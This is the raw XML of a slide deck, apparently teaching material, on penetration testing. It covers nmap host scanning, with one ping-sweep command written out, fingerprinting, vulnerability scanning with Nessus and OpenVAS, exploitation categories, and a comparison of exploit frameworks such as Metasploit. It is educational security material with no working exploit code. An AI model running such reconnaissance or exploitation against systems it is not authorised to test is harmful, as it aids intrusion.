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6" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId32"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="319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50" r:id="rId26"/>
    <p:sldId id="349" r:id="rId27"/>
    <p:sldId id="345" r:id="rId28"/>
    <p:sldId id="346" r:id="rId29"/>
    <p:sldId id="347" r:id="rId30"/>
    <p:sldId id="348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ヒラギノ角ゴ Pro W3"/>
        <a:cs typeface="ヒラギノ角ゴ Pro W3"/>
        <a:sym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ヒラギノ角ゴ Pro W3"/>
        <a:cs typeface="ヒラギノ角ゴ Pro W3"/>
        <a:sym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ヒラギノ角ゴ Pro W3"/>
        <a:cs typeface="ヒラギノ角ゴ Pro W3"/>
        <a:sym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ヒラギノ角ゴ Pro W3"/>
        <a:cs typeface="ヒラギノ角ゴ Pro W3"/>
        <a:sym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ヒラギノ角ゴ Pro W3"/>
        <a:cs typeface="ヒラギノ角ゴ Pro W3"/>
        <a:sym typeface="Arial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ヒラギノ角ゴ Pro W3"/>
        <a:cs typeface="ヒラギノ角ゴ Pro W3"/>
        <a:sym typeface="Arial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ヒラギノ角ゴ Pro W3"/>
        <a:cs typeface="ヒラギノ角ゴ Pro W3"/>
        <a:sym typeface="Arial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ヒラギノ角ゴ Pro W3"/>
        <a:cs typeface="ヒラギノ角ゴ Pro W3"/>
        <a:sym typeface="Arial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ヒラギノ角ゴ Pro W3"/>
        <a:cs typeface="ヒラギノ角ゴ Pro W3"/>
        <a:sym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1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84767" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="98" d="100"/>
          <a:sy n="98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"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="138" d="100"/>
          <a:sy n="138" d="100"/>
        </p:scale>
        <p:origin x="-3174" y="-11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Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF7A3EB0-E94D-4AD8-B508-2C21E51CD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55675">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B22675DC-4653-4CCE-BBE1-78CCBA99E8E9}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="955675">
                <a:defRPr/>
              </a:pPr>
              <a:t>1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55675">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D62B3D6B-8C3D-40E7-95B7-C3CBF95B2E46}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="955675">
                <a:defRPr/>
              </a:pPr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-"/>
            </a:pPr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55675">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CC4C79E5-6329-4218-9DFF-FF249755F7D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="955675">
                <a:defRPr/>
              </a:pPr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55675">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A60E72E3-F20A-418D-9BD4-07AE0AC0FF0B}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="955675">
                <a:defRPr/>
              </a:pPr>
              <a:t>6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5435557B-8326-4E2E-8E3A-014693C61646}" type="slidenum">
              <a:rPr lang="en-GB">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0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0413" cy="3429000"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/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ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT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>
              <a:latin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6DF7ABE-D8CA-428A-BFB5-3797492F743C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55675">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B48144F4-489D-4D0F-AC71-FEDB1E963F75}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="955675">
                <a:defRPr/>
              </a:pPr>
              <a:t>20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it-IT" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap -v -sP 192.168.15.0/24 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egrep 'up|MAC'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55675">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{67D897EA-2611-4BE5-B096-DAFD56A235D2}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="955675">
                <a:defRPr/>
              </a:pPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" smtClean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0F8AD-1A4B-456C-887D-DD846EB76D51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694FA-33DF-49DB-B9E4-F1FF85FF2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E5F85-4A62-4BAF-AC90-E4DBFB144C5D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387A9-5D3D-4FA5-AFC7-49AE90A12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6FA5C-609A-4270-B694-BA8BCFA8D6E3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36CDE-9714-4FBF-B2EA-5256F6038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4687DE-3DAB-4845-AB8F-B0699581202A}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>12/7/2010</a:t>
            </a:fld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Penetration Testing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2D887-1B13-46AE-B217-51A09D8F0B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7C1E5-5208-423B-8AE7-DF4C72891F52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3209C-75A8-4EEE-9DBC-F73FE5886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3755A-AB13-49E4-9AB9-233C63B15611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6F66A-9B40-42DA-BB2F-473B1C9F4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FA3CC-BD5E-4F74-A2B9-7A8482E6C28F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CAC50-82A3-4A87-B478-5146A9FC2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6162-097C-47F0-B924-F2D6B43C833A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D4876-0E33-42D1-B70B-2587CB393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5779F-68E1-495F-9616-65B097D9927D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57A15-F401-4F2C-AF31-540B3DD13F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A8082-2B3A-4BE8-8581-B9CB638F2A78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BF16A-285F-4D6A-ABF7-FF0B43979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C787A-B4A8-45E1-93D2-A4DD1244319F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16038-82DA-421D-B5DB-494381523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AB838-A420-4105-8BCF-C1B9994A877F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D9ECB-3E47-4832-8E9C-28DA5B9B8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0DA262-5F5C-4080-BCCA-F6E3491DCE7D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B40B1D-3323-4314-ADF6-9DFDAEA2E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nmap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sstmm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196975"/>
            <a:ext cx="7991475" cy="2879725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto data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10DB968-1A81-4484-A270-B6A92F997152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8B4451-9544-46BA-A8AE-3469E59A7BE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EFB3A3-0A9F-4B84-8701-931BD32E0D9E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4339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Scan IP Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340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Goal – Given a set of IP addresses, determine what services and Operating Systems each is running.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Nmap – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.nmap.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Gfi languard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto dat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56570C-CC28-4A42-A032-4122BA6B06DF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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="143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971800"/>
            <a:ext cx="16002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3695700"/>
            <a:ext cx="18288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196BB-966A-4A07-A821-1E229107B6D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Fingerprinting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web server is running?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What accounts have I found?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What services are running?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What OSes are running?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Who is logged in?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Is there available information on the web site?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DC8508F-784C-4E70-980D-0D0EA0E78427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1B768-4AD6-4313-919F-E31CA42E7A57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Identify Vulnerable Services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Given a specific IP address and port, try to gain access to the machine. Report all known vulnerabilities for this target.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Nessus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OpenVAS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r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp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2895600"/>
            <a:ext cx="1028700" cy="9906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lg"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto data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680DCA6-DC35-4537-9F96-65583D750AD9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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1639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114800"/>
            <a:ext cx="21939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lg"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto dat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DC3C2B5-FFD2-4CD6-9DF0-5CCC081AD7A0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99C7AB-0C37-45F2-9A80-096ED330935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1843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mtClean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88" y="39688"/>
            <a:ext cx="9078912" cy="679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dat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FDDA3DB-4E20-418D-B0BA-452D24C84B1D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C7264-5F26-4DF9-83B9-906B0FA6EC6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Exploit vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1945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Try to exploit detected vulnerabilities, for example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Buffer overflow </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Heap overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Cross-site scripting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>Metasploit is a framework that allows to test attacks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7BE51F2-3444-4B61-8378-B15C59DAEC20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4BEFCE-EEC1-494D-8ACE-A6D0290E8C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lg"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto dat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EDB1EF8-2215-4D94-9DFC-6E2FAAA7132A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F01AD-577F-4558-9A60-155C7BB9ED9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0" y="0"/>
            <a:ext cx="9144000" cy="1306513"/>
          </a:xfrm>
          <a:prstGeom prst="rect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75" y="163513"/>
            <a:ext cx="1754188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0938" y="163513"/>
            <a:ext cx="6396037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1509" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2122488" y="600075"/>
            <a:ext cx="7021512" cy="766763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="124000"/>
              </a:lnSpc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</a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alternatives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0175" y="1419225"/>
          <a:ext cx="8848829" cy="5535701"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1909653"/>
                <a:gridCol w="1691540"/>
                <a:gridCol w="1713626"/>
                <a:gridCol w="1771607"/>
                <a:gridCol w="1762403"/>
              </a:tblGrid>
              <a:tr h="806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50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>                       </a:t>
                      </a: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Tools</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600" kern="50" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans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it-IT" sz="1600" b="1" kern="50" dirty="0" smtClean="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans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kern="50" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Features</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600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Core</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> Impact</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600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Immunity</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a: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Canvas</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600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kern="50">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>SecurityForest</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600" kern="5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Metasploit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600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8582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License</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600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25.000$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Open-source (but some libraries are only in binaries)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1.450$ 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Open source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3 months of updates and support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latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Free and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Open-source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latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Free and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Open-source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2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Number</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a: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of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a: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Exploits</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600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latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a: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latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>more </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> 150</a:t>
                      </a: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latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>~2500 (at </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>February</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> 2005)</a:t>
                      </a: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latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>191 (at October 2007)</a:t>
                      </a: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Updates</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600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latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Frequently (weekly)</a:t>
                      </a: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Frequently (average 4  exploit every month)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latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Occasionally (last updates in 2005)</a:t>
                      </a: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>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Occasionally (last updates on October 2007)</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1400" b="1" kern="5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7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Platform</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600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latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Only Windows</a:t>
                      </a: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 err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Independent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 err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Only</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> Windows</a:t>
                      </a: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latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Independent</a:t>
                      </a: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0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Program</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a: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Language</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600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latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Python</a:t>
                      </a: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latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Python</a:t>
                      </a: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Perl for framework, many others languages for exploits (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>C,Perl,Python,Ruby,Shell</a:t>
                      </a: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,...)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>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Ruby, C, Assembler</a:t>
                      </a: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3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b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Advantages</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600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Report system /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 err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Integrationwith</a:t>
                      </a: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 vulnerability assessment tools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kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>0-day </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>payload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Number of pre-compiled exploits (see </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>ExploitationTree</a:t>
                      </a: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)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Free /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IDS-IPS evasion /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kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>support to write exploits and large used in security community</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25455" marR="25455" marT="25457" marB="2545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560" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="168275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 anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21561" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-34925" y="-38100"/>
            <a:ext cx="1189038" cy="492125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21562" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="414338"/>
            <a:ext cx="168275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 anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21563" name="Connettore 1 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="100013" y="1419225"/>
            <a:ext cx="1944687" cy="7778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Penetration Test</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tutorial</a:t>
            </a:r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7DAB201-70AB-4727-A64B-4AC547491A03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3D5729-B398-47B5-9115-39CF543D35E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500562" y="2143116"/>
            <a:ext cx="5467352" cy="321608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0"/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perspectiveContrastingLeftFacing"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rettangolo 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="0"/>
            <a:ext cx="8215313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sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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(Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="44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Mapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="4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500063" y="762000"/>
            <a:ext cx="8643937" cy="643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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port Division </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> open, closed, filtered, unfiltered, open|filtered and closed|filtered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scanning techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
